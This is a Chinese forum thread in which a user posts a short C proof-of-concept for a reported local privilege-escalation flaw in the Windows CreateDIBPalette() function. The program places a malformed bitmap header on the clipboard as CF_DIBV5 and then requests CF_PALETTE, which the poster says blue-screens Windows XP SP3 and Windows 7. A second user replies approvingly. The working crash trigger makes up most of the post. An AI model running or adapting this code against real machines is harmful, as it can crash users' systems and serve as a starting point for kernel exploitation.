CreateDIBPalette()函数本地权限提升漏洞

Tesla.Angela

很久以前某网友在QQ上给我的，不知道现在修复了没有。。。
经我测试，可以在Windows XP SP3和Windows 7 x86/x64 RTM上引发蓝屏。。。

1. 
   
2. #include <windows.h>
   
3. #define CF_DIBV5 17
   
4. int main()
   
5. {
   
6.     DEVMODE dm = {0};
   
7.     dm.dmSize = sizeof(DEVMODE);
   
8.     dm.dmBitsPerPel = 8;
   
9.     dm.dmPelsWidth = 800;
   
10.     dm.dmPelsHeight = 600;
    
11.     dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
    
12.     ChangeDisplaySettings(&dm, 0);
    
13.     BITMAPINFOHEADER bmih = {0};
    
14.     bmih.biClrUsed = 0x200;//超过256
    
15.     HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0x1000);
    
16.     memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
    
17.     GlobalUnlock(h);
    
18.     ::OpenClipboard(NULL);
    
19.     ::SetClipboardData(CF_DIBV5, (HANDLE)h);
    
20.     ::CloseClipboard();
    
21.     ::OpenClipboard(NULL);
    
22.     ::GetClipboardData(CF_PALETTE);
    
23.     return 0;
    
24. }
    

复制代码

IDE是Code::Blocks 10.05。

nbboy

围观又一个漏洞！